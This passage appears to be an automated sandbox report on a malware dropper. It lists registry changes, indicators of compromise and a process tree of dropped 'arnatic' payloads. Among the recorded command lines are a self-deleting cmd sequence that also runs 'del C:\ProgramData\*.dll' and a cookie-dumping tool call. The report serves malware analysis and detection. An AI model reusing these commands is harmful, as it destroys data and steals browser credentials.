Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\allhugenewz.com\ = "137" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. = 01000000202107ed62bb3d811eb95c14f55ce78de09b00e2155b39577fa9f147071ad15593b3b9d83d233826912130ec9841a5bc1f8d4a117ba7c4f4316543cf9c079aef878b0882d5bb8ca9ebf7052c83df0db85953479e567492bebf9d65585b7e97053ac8d3061e251a3ef35ad5a3add658ddbc0e270d8f62da5416736c6f811da2a4408a7b1f03002911ba6a403d95c6b3fe04df8590b7118222f705aed18e853e9d09f1b755e5eb1caeb9475a674b4f0edc7fe447a39a219f881575fdec155772f8e71c4d887e88f870fd11c29a03114329d53e9af44133c51683e17a2f8831570fa92d6bc0b975cb0790e8a1f508ac8b239d0dd5a72fe574d6366b452921b57f2660432954a3542b07daeceaf141c061b95472e1dc6dd803a791316b7dfe81359b067e005d22c4978b853d10017eedee3e018bdc8e0cacfda62755d99f9236f5a3cffdc87cce6447eb99fb7f7864d30fb6d779a1c1f3015facbcf5b0682a753c9c9ee2deeed4d6ee78bf46ff429611fca7995c60fcaa77c8d324335274b3dc1fe7f34cf4ef36b95457993ed46fa849bb8246551015f9ae6717996b013943433d1c3e2a6254d8c8 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\FirstRecoveryTime = 301bd569d72dd701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DomStorageState MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DomStorageState\EdpCleanupState = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B72164C = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation MicrosoftEdge.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 5376 PING.EXE -
Script User-Agent 8 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 670 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 544 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 545 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 547 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 560 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 564 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 581 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 664 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1000 rUNdlL32.eXe 1000 rUNdlL32.eXe 2556 svchost.exe 2556 svchost.exe 5096 jfiag3g_gg.exe 5096 jfiag3g_gg.exe 3792 arnatic_2.exe 3792 arnatic_2.exe 4164 5925079.exe 4164 5925079.exe 3784 7652125.exe 3784 7652125.exe 4232 8769103.exe 4232 8769103.exe 3784 7652125.exe 3020 Process not Found 3020 Process not Found 3020 Process not Found 3020 Process not Found 3020 Process not Found 3020 Process not Found 3780 chrome.exe 3780 chrome.exe 3780 chrome.exe 3780 chrome.exe 3780 chrome.exe 3780 chrome.exe 3020 Process not Found 3020 Process not Found 3020 Process not Found 3020 Process not Found 3020 Process not Found 3020 Process not Found 3020 Process not Found 3020 Process not Found 3020 Process not Found 3020 Process not Found 3020 Process not Found 3020 Process not Found 3020 Process not Found 3020 Process not Found 3020 Process not Found 3020 Process not Found 3020 Process not Found 3020 Process not Found 3020 Process not Found 3020 Process not Found 3020 Process not Found 3020 Process not Found 3780 chrome.exe 3780 chrome.exe 3020 Process not Found 3020 Process not Found 3020 Process not Found 3020 Process not Found 3020 Process not Found 3020 Process not Found 3020 Process not Found 3020 Process not Found 3020 Process not Found 3020 Process not Found 3020 Process not Found 3020 Process not Found 3020 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3020 Process not Found -
Suspicious behavior: MapViewOfSection 64 IoCs
pid Process 3792 arnatic_2.exe 5440 chrome.exe 5092 jwhurww 3020 Process not Found 3020 Process not Found 3020 Process not Found 3020 Process not Found 4232 912A.exe 3020 Process not Found 3020 Process not Found 3020 Process not Found 3020 Process not Found 3020 Process not Found 3020 Process not Found 3020 Process not Found 3020 Process not Found 3020 Process not Found 3020 Process not Found 3020 Process not Found 3020 Process not Found 3020 Process not Found 3020 Process not Found 4272 explorer.exe 4272 explorer.exe 5848 explorer.exe 5848 explorer.exe 5848 explorer.exe 5848 explorer.exe 1696 explorer.exe 1696 explorer.exe 1696 explorer.exe 1696 explorer.exe 4272 explorer.exe 4272 explorer.exe 4644 MicrosoftEdgeCP.exe 4644 MicrosoftEdgeCP.exe 4272 explorer.exe 4272 explorer.exe 4272 explorer.exe 4272 explorer.exe 5848 explorer.exe 5848 explorer.exe 1696 explorer.exe 1696 explorer.exe 4272 explorer.exe 4272 explorer.exe 5848 explorer.exe 5848 explorer.exe 5848 explorer.exe 5848 explorer.exe 2088 toolspab1.exe 5848 explorer.exe 5848 explorer.exe 5848 explorer.exe 5848 explorer.exe 5848 explorer.exe 5848 explorer.exe 1696 explorer.exe 1696 explorer.exe 1696 explorer.exe 1696 explorer.exe 1696 explorer.exe 1696 explorer.exe 1696 explorer.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3776 arnatic_5.exe Token: SeDebugPrivilege 1000 rUNdlL32.eXe Token: SeDebugPrivilege 2556 svchost.exe Token: SeDebugPrivilege 1000 rUNdlL32.eXe Token: SeDebugPrivilege 1000 rUNdlL32.eXe Token: SeDebugPrivilege 1000 rUNdlL32.eXe Token: SeDebugPrivilege 1000 rUNdlL32.eXe Token: SeDebugPrivilege 1000 rUNdlL32.eXe Token: SeDebugPrivilege 1000 rUNdlL32.eXe Token: SeDebugPrivilege 1000 rUNdlL32.eXe Token: SeDebugPrivilege 1000 rUNdlL32.eXe Token: SeDebugPrivilege 1000 rUNdlL32.eXe Token: SeDebugPrivilege 3784 7652125.exe Token: SeDebugPrivilege 4232 8769103.exe Token: SeDebugPrivilege 1000 rUNdlL32.eXe Token: SeDebugPrivilege 1000 rUNdlL32.eXe Token: SeDebugPrivilege 1000 rUNdlL32.eXe Token: SeAssignPrimaryTokenPrivilege 2680 svchost.exe Token: SeIncreaseQuotaPrivilege 2680 svchost.exe Token: SeSecurityPrivilege 2680 svchost.exe Token: SeTakeOwnershipPrivilege 2680 svchost.exe Token: SeLoadDriverPrivilege 2680 svchost.exe Token: SeSystemtimePrivilege 2680 svchost.exe Token: SeBackupPrivilege 2680 svchost.exe Token: SeRestorePrivilege 2680 svchost.exe Token: SeShutdownPrivilege 2680 svchost.exe Token: SeSystemEnvironmentPrivilege 2680 svchost.exe Token: SeUndockPrivilege 2680 svchost.exe Token: SeManageVolumePrivilege 2680 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2680 svchost.exe Token: SeIncreaseQuotaPrivilege 2680 svchost.exe Token: SeSecurityPrivilege 2680 svchost.exe Token: SeTakeOwnershipPrivilege 2680 svchost.exe Token: SeLoadDriverPrivilege 2680 svchost.exe Token: SeSystemtimePrivilege 2680 svchost.exe Token: SeBackupPrivilege 2680 svchost.exe Token: SeRestorePrivilege 2680 svchost.exe Token: SeShutdownPrivilege 2680 svchost.exe Token: SeSystemEnvironmentPrivilege 2680 svchost.exe Token: SeUndockPrivilege 2680 svchost.exe Token: SeManageVolumePrivilege 2680 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2680 svchost.exe Token: SeIncreaseQuotaPrivilege 2680 svchost.exe Token: SeSecurityPrivilege 2680 svchost.exe Token: SeTakeOwnershipPrivilege 2680 svchost.exe Token: SeLoadDriverPrivilege 2680 svchost.exe Token: SeSystemtimePrivilege 2680 svchost.exe Token: SeBackupPrivilege 2680 svchost.exe Token: SeRestorePrivilege 2680 svchost.exe Token: SeShutdownPrivilege 2680 svchost.exe Token: SeSystemEnvironmentPrivilege 2680 svchost.exe Token: SeUndockPrivilege 2680 svchost.exe Token: SeManageVolumePrivilege 2680 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2680 svchost.exe Token: SeIncreaseQuotaPrivilege 2680 svchost.exe Token: SeSecurityPrivilege 2680 svchost.exe Token: SeTakeOwnershipPrivilege 2680 svchost.exe Token: SeLoadDriverPrivilege 2680 svchost.exe Token: SeSystemtimePrivilege 2680 svchost.exe Token: SeBackupPrivilege 2680 svchost.exe Token: SeRestorePrivilege 2680 svchost.exe Token: SeShutdownPrivilege 2680 svchost.exe Token: SeSystemEnvironmentPrivilege 2680 svchost.exe Token: SeUndockPrivilege 2680 svchost.exe -
Suspicious use of FindShellTrayWindow 22 IoCs
pid Process 3020 Process not Found 3020 Process not Found 4104 chrome.exe 4104 chrome.exe 3020 Process not Found 3020 Process not Found 3020 Process not Found 3020 Process not Found 1784 irecord.tmp 4392 Setup3310.tmp 3020 Process not Found 3020 Process not Found 2240 chrome.exe 2240 chrome.exe 3020 Process not Found 3020 Process not Found 3020 Process not Found 3020 Process not Found 3020 Process not Found 3020 Process not Found 3020 Process not Found 3020 Process not Found -
Suspicious use of SendNotifyMessage 4 IoCs
pid Process 3020 Process not Found 3020 Process not Found 3020 Process not Found 3020 Process not Found -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 5484 3193.exe 4328 3359.exe 3020 Process not Found 2456 MicrosoftEdge.exe 4644 MicrosoftEdgeCP.exe 4644 MicrosoftEdgeCP.exe 304 MicrosoftEdge.exe 5424 MicrosoftEdgeCP.exe 5424 MicrosoftEdgeCP.exe 2276 MicrosoftEdge.exe 4984 MicrosoftEdgeCP.exe 4984 MicrosoftEdgeCP.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2388 wrote to memory of 2628 2388 setup_x86_x64_install - копия (2).exe 76 PID 2388 wrote to memory of 2628 2388 setup_x86_x64_install - копия (2).exe 76 PID 2388 wrote to memory of 2628 2388 setup_x86_x64_install - копия (2).exe 76 PID 2628 wrote to memory of 2912 2628 setup_installer.exe 77 PID 2628 wrote to memory of 2912 2628 setup_installer.exe 77 PID 2628 wrote to memory of 2912 2628 setup_installer.exe 77 PID 2912 wrote to memory of 740 2912 setup_install.exe 80 PID 2912 wrote to memory of 740 2912 setup_install.exe 80 PID 2912 wrote to memory of 740 2912 setup_install.exe 80 PID 2912 wrote to memory of 1300 2912 setup_install.exe 81 PID 2912 wrote to memory of 1300 2912 setup_install.exe 81 PID 2912 wrote to memory of 1300 2912 setup_install.exe 81 PID 2912 wrote to memory of 2068 2912 setup_install.exe 82 PID 2912 wrote to memory of 2068 2912 setup_install.exe 82 PID 2912 wrote to memory of 2068 2912 setup_install.exe 82 PID 2912 wrote to memory of 2128 2912 setup_install.exe 83 PID 2912 wrote to memory of 2128 2912 setup_install.exe 83 PID 2912 wrote to memory of 2128 2912 setup_install.exe 83 PID 2912 wrote to memory of 4008 2912 setup_install.exe 84 PID 2912 wrote to memory of 4008 2912 setup_install.exe 84 PID 2912 wrote to memory of 4008 2912 setup_install.exe 84 PID 2912 wrote to memory of 1288 2912 setup_install.exe 85 PID 2912 wrote to memory of 1288 2912 setup_install.exe 85 PID 2912 wrote to memory of 1288 2912 setup_install.exe 85 PID 2912 wrote to memory of 1340 2912 setup_install.exe 86 PID 2912 wrote to memory of 1340 2912 setup_install.exe 86 PID 2912 wrote to memory of 1340 2912 setup_install.exe 86 PID 4008 wrote to memory of 3776 4008 cmd.exe 93 PID 4008 wrote to memory of 3776 4008 cmd.exe 93 PID 1288 wrote to memory of 3668 1288 cmd.exe 90 PID 740 wrote to memory of 3780 740 cmd.exe 91 PID 1288 wrote to memory of 3668 1288 cmd.exe 90 PID 1288 wrote to memory of 3668 1288 cmd.exe 90 PID 740 wrote to memory of 3780 740 cmd.exe 91 PID 740 wrote to memory of 3780 740 cmd.exe 91 PID 1300 wrote to memory of 3792 1300 cmd.exe 92 PID 1300 wrote to memory of 3792 1300 cmd.exe 92 PID 1300 wrote to memory of 3792 1300 cmd.exe 92 PID 2128 wrote to memory of 2688 2128 cmd.exe 87 PID 2128 wrote to memory of 2688 2128 cmd.exe 87 PID 2128 wrote to memory of 2688 2128 cmd.exe 87 PID 2068 wrote to memory of 3784 2068 cmd.exe 98 PID 2068 wrote to memory of 3784 2068 cmd.exe 98 PID 2068 wrote to memory of 3784 2068 cmd.exe 98 PID 1340 wrote to memory of 200 1340 cmd.exe 89 PID 1340 wrote to memory of 200 1340 cmd.exe 89 PID 1340 wrote to memory of 200 1340 cmd.exe 89 PID 2688 wrote to memory of 4060 2688 arnatic_4.exe 94 PID 2688 wrote to memory of 4060 2688 arnatic_4.exe 94 PID 2688 wrote to memory of 4060 2688 arnatic_4.exe 94 PID 200 wrote to memory of 940 200 arnatic_7.exe 95 PID 200 wrote to memory of 940 200 arnatic_7.exe 95 PID 200 wrote to memory of 940 200 arnatic_7.exe 95 PID 3784 wrote to memory of 1000 3784 7652125.exe 96 PID 3784 wrote to memory of 1000 3784 7652125.exe 96 PID 3784 wrote to memory of 1000 3784 7652125.exe 96 PID 1000 wrote to memory of 2556 1000 rUNdlL32.eXe 69 PID 2556 wrote to memory of 2628 2556 svchost.exe 97 PID 2556 wrote to memory of 2628 2556 svchost.exe 97 PID 1000 wrote to memory of 2560 1000 rUNdlL32.eXe 27 PID 2556 wrote to memory of 2628 2556 svchost.exe 97 PID 3776 wrote to memory of 3784 3776 arnatic_5.exe 98 PID 3776 wrote to memory of 3784 3776 arnatic_5.exe 98 PID 3776 wrote to memory of 3784 3776 arnatic_5.exe 98
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵PID:2708
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2680
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵PID:2560
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵PID:2424
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵PID:2372
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵PID:1872
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵PID:1448
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵PID:1348
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵PID:1316
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵PID:1100
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
PID:912 -
C:\Users\Admin\AppData\Roaming\jwhurwwC:\Users\Admin\AppData\Roaming\jwhurww2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:5092
-
-
C:\Users\Admin\AppData\Local\91b39c1d-9ff8-4ddd-8a74-5322b80fb6ae\FB15.exeC:\Users\Admin\AppData\Local\91b39c1d-9ff8-4ddd-8a74-5322b80fb6ae\FB15.exe --Task2⤵
- Suspicious use of SetThreadContext
PID:5140 -
C:\Users\Admin\AppData\Local\91b39c1d-9ff8-4ddd-8a74-5322b80fb6ae\FB15.exeC:\Users\Admin\AppData\Local\91b39c1d-9ff8-4ddd-8a74-5322b80fb6ae\FB15.exe --Task3⤵PID:5680
-
-
-
C:\Users\Admin\AppData\Local\91b39c1d-9ff8-4ddd-8a74-5322b80fb6ae\FB15.exeC:\Users\Admin\AppData\Local\91b39c1d-9ff8-4ddd-8a74-5322b80fb6ae\FB15.exe --Task2⤵
- Suspicious use of SetThreadContext
PID:6988 -
C:\Users\Admin\AppData\Local\91b39c1d-9ff8-4ddd-8a74-5322b80fb6ae\FB15.exeC:\Users\Admin\AppData\Local\91b39c1d-9ff8-4ddd-8a74-5322b80fb6ae\FB15.exe --Task3⤵PID:6740
-
-
-
C:\Users\Admin\AppData\Roaming\jwhurwwC:\Users\Admin\AppData\Roaming\jwhurww2⤵
- Checks SCSI registry key(s)
PID:4328
-
-
C:\Windows\system32\rundll32.exeC:\Windows\system32\rundll32.exe "C:\Program Files (x86)\QRIvBFx\QRIvBFx.dll",QRIvBFx2⤵
- Windows security modification
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3004
-
-
C:\Users\Admin\AppData\Roaming\crhurwwC:\Users\Admin\AppData\Roaming\crhurww2⤵
- Suspicious use of SetThreadContext
PID:4744 -
C:\Users\Admin\AppData\Roaming\crhurwwC:\Users\Admin\AppData\Roaming\crhurww3⤵
- Checks SCSI registry key(s)
PID:6724
-
-
-
C:\Users\Admin\AppData\Roaming\dshurwwC:\Users\Admin\AppData\Roaming\dshurww2⤵
- Checks SCSI registry key(s)
PID:2604
-
-
C:\Users\Admin\AppData\Local\91b39c1d-9ff8-4ddd-8a74-5322b80fb6ae\FB15.exeC:\Users\Admin\AppData\Local\91b39c1d-9ff8-4ddd-8a74-5322b80fb6ae\FB15.exe --Task2⤵
- Suspicious use of SetThreadContext
PID:5736 -
C:\Users\Admin\AppData\Local\91b39c1d-9ff8-4ddd-8a74-5322b80fb6ae\FB15.exeC:\Users\Admin\AppData\Local\91b39c1d-9ff8-4ddd-8a74-5322b80fb6ae\FB15.exe --Task3⤵PID:1464
-
-
-
C:\Users\Admin\AppData\Local\91b39c1d-9ff8-4ddd-8a74-5322b80fb6ae\FB15.exeC:\Users\Admin\AppData\Local\91b39c1d-9ff8-4ddd-8a74-5322b80fb6ae\FB15.exe --Task2⤵
- Suspicious use of SetThreadContext
PID:1552 -
C:\Users\Admin\AppData\Local\91b39c1d-9ff8-4ddd-8a74-5322b80fb6ae\FB15.exeC:\Users\Admin\AppData\Local\91b39c1d-9ff8-4ddd-8a74-5322b80fb6ae\FB15.exe --Task3⤵PID:1816
-
-
-
C:\Users\Admin\AppData\Roaming\jwhurwwC:\Users\Admin\AppData\Roaming\jwhurww2⤵
- Checks SCSI registry key(s)
PID:5616
-
-
C:\Users\Admin\AppData\Roaming\crhurwwC:\Users\Admin\AppData\Roaming\crhurww2⤵
- Suspicious use of SetThreadContext
PID:6704 -
C:\Users\Admin\AppData\Roaming\crhurwwC:\Users\Admin\AppData\Roaming\crhurww3⤵
- Checks SCSI registry key(s)
PID:2212
-
-
-
C:\Users\Admin\AppData\Roaming\dshurwwC:\Users\Admin\AppData\Roaming\dshurww2⤵
- Checks SCSI registry key(s)
PID:3508
-
-
C:\Users\Admin\AppData\Local\91b39c1d-9ff8-4ddd-8a74-5322b80fb6ae\FB15.exeC:\Users\Admin\AppData\Local\91b39c1d-9ff8-4ddd-8a74-5322b80fb6ae\FB15.exe --Task2⤵
- Suspicious use of SetThreadContext
PID:6900 -
C:\Users\Admin\AppData\Local\91b39c1d-9ff8-4ddd-8a74-5322b80fb6ae\FB15.exeC:\Users\Admin\AppData\Local\91b39c1d-9ff8-4ddd-8a74-5322b80fb6ae\FB15.exe --Task3⤵PID:5928
-
-
-
C:\Users\Admin\AppData\Local\91b39c1d-9ff8-4ddd-8a74-5322b80fb6ae\FB15.exeC:\Users\Admin\AppData\Local\91b39c1d-9ff8-4ddd-8a74-5322b80fb6ae\FB15.exe --Task2⤵
- Suspicious use of SetThreadContext
PID:6844 -
C:\Users\Admin\AppData\Local\91b39c1d-9ff8-4ddd-8a74-5322b80fb6ae\FB15.exeC:\Users\Admin\AppData\Local\91b39c1d-9ff8-4ddd-8a74-5322b80fb6ae\FB15.exe --Task3⤵PID:6984
-
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵PID:1012
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install - копия (2).exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install - копия (2).exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2388 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2628 -
C:\Users\Admin\AppData\Local\Temp\7zS44ACA364\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS44ACA364\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2912 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c arnatic_1.exe4⤵
- Suspicious use of WriteProcessMemory
PID:740 -
C:\Users\Admin\AppData\Local\Temp\7zS44ACA364\arnatic_1.exearnatic_1.exe5⤵
- Executes dropped EXE
PID:3780 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im arnatic_1.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS44ACA364\arnatic_1.exe" & del C:\ProgramData\*.dll & exit6⤵PID:3464
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im arnatic_1.exe /f7⤵
- Kills process with taskkill
PID:2312
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 67⤵
- Delays execution with timeout.exe
PID:4420
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c arnatic_2.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1300 -
C:\Users\Admin\AppData\Local\Temp\7zS44ACA364\arnatic_2.exearnatic_2.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3792
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c arnatic_3.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2068 -
C:\Users\Admin\AppData\Local\Temp\7zS44ACA364\arnatic_3.exearnatic_3.exe5⤵PID:3784
-
C:\Windows\SysWOW64\rUNdlL32.eXe"C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",axhub6⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1000
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c arnatic_4.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2128 -
C:\Users\Admin\AppData\Local\Temp\7zS44ACA364\arnatic_4.exearnatic_4.exe5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2688 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵
- Executes dropped EXE
PID:4060
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:5096
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵PID:7076
-
-
